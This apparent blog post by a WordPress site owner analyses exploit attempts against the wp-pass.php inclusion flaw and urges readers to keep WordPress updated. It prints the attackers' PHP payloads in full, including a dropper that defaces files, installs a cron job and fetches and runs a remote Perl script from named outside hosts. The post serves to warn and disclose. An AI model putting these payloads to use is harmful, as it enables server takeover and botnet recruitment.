Since the new year – new years day, strangely enough – Ive noticed a change in the way “the bad guys” try to interact with my site. Spam has slowed to a trickle, whereas attempts to exploit WordPress vulnerabilities seem to have increased 10 fold.
Seriously, I don’t use Askimet – just comment moderation – and if I didn’t know better I’d think the blog spam epidemic was over! (we can all wish)
But the exploits… it always seems to be the same type, all of which (so far) have been stopped by the fact I update my WordPress install regularly. The common trick is using the wp-pass.php vulnerability, which was apparently fixed in wp 2.2.2. Basically, my logs show a 404 from this address like this:
https://mou.me.uk/wp-pass.php/?_wp_http_referer=http://frikyrkja.net/config/exp667.txt?
(We can assume http://frikyrkja.net is probably a compromised server somewhere)
So, of course, I check out this site and take a look what nasty code they’re trying to execute. 9 times out of 10, its looked relatively harmless:
$cmd="id"; $eseguicmd=ex($cmd); echo $eseguicmd; function ex($cfe){ $res = ''; if (!empty($cfe)){ if(function_exists('exec')){ @exec($cfe,$res); $res = join("\n",$res); } elseif(function_exists('shell_exec')){ $res = @shell_exec($cfe); } elseif(function_exists('system')){ @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')){ @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))){ $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); }} return $res; }
This seems like more of a fact finder – testing to see if your server is vulnerable, etc. But today, I came across a particularly bad one:
//exploiter v0.01 for rfi reloader by axe $safemode=@ini_get('safe_mode'); if (@$_GET['filexp']) { if (@$_GET['deface_msg']) { $deface_msg = $_GET['deface_msg']; } else { $deface_msg = 'Patched Mother Fucker :p'; } $filexp = $_GET['filexp']; $fp = fopen("$filexp","w"); if ($fp) { fwrite($fp,$deface_msg); fclose($fp); } } $fp = file_exists('index.php'); if ($fp) { } else { passthru('touch index.php'); } if ($safemode) { ini_restore("safe_mode"); ini_restore("open_basedir"); shell_exec('killall -9 perl'); shell_exec('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); shell_exec('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); shell_exec('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); shell_exec('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*'); shell_exec("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' >cron.job;crontab cron.job;rm -rf cron.job"); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); shell_exec('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); } else { passthru('killall -9 perl'); passthru('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); passthru('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); passthru('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php'); passthru('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*'); passthru("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' >cron.job;crontab cron.job;rm -rf cron.job"); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); passthru('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt >brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*'); }
I’ll be the first to admit my Unix knowledge leaves a lot to be desired, but from what I can see this looks to be setting up a cron job to run a file 1 minute later before creating a folder and uses every method it can to try to download a text file to your server, which is then executed when the minute is up and the cron job deletes itself. Clever. You can see an example of the text file by clicking here. (Note: Ive added an exit;
command top to stop the b*astards using this text file on other people!)
Scary as hell. I havent had a chance to sit down and puzzle out exactly what this script does if you execute it, but I’m willing to bet its not pretty. There seems to be some code to connect to an IRC server, so the point of this is most likely to turn your server into a zombie bot. Or possibly to host exploit scripts for other unpatched WP users to download. I’ll know more when I go through it properly (and hopefully learn a few new things about Unix!!)
The moral of the story? Keep your WordPress up to date! 😀 No seriously, go do it now…
There are no responses yet